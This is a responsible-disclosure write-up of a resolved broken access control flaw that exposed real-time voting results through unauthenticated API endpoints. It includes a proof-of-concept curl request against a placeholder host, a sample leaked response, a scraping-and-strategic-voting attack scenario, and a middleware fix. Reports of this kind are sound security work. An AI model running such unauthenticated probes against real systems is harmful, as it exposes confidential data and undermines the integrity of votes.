BAC Private Program 2026-01-05
Real-Time Voting Results Leak via Broken Access Control
Severity: Critical | Status: Resolved
Summary
A critical failure in authorization logic allowed unauthenticated users to access real-time voting statistics. Key endpoints did not require a valid JWT or administrative privileges.
Vulnerability Details
The voting platform was designed to keep results secret until the official announcement. However, multiple API endpoints leaked this data publicly.
Affected Endpoints
| Endpoint | Expected Access | Actual Access |
|---|---|---|
/api/voting/results/{id} | Admin only | Public |
/api/voting/stats | Admin only | Public |
/api/stats/widget | Internal | Public |
Proof of Concept
Any user could monitor the leaderboard without authentication:
curl -X GET "https://target.com/api/voting/results/6952bac3d321da2afb566769"Response (Sensitive Data Exposed)
{
"category": "Best Creator",
"results": [
{ "nominee": "Candidate A", "votes": 1547 },
{ "nominee": "Candidate B", "votes": 1203 },
{ "nominee": "Candidate C", "votes": 891 }
],
"totalVotes": 3641,
"lastUpdated": "2025-03-15T14:30:00Z"
}Attack Scenario
┌──────────────┐
│ Attacker │
└──────┬───────┘
│
▼ No auth required
┌──────────────┐
│ Scrape API │──▶ Every 5 minutes
└──────┬───────┘
│
▼
┌──────────────┐
│ Build Live │
│ Leaderboard │
└──────┬───────┘
│
▼
┌──────────────┐
│ Strategic │
│ Voting │──▶ Vote for losing candidate
└──────────────┘ to manipulate resultsImpact
- Total loss of poll integrity
- Enables “strategic voting” (sniping)
- Ruins surprise of official announcement
- Potential for vote manipulation based on real-time data
Remediation
// Add authentication middleware
router.get('/voting/results/:id',
authMiddleware,
adminOnly, // Role check
async (req, res) => {
const results = await VotingService.getResults(req.params.id);
res.json(results);
}
);Responsible Disclosure
This vulnerability was reported responsibly and fixed by the vendor before public disclosure.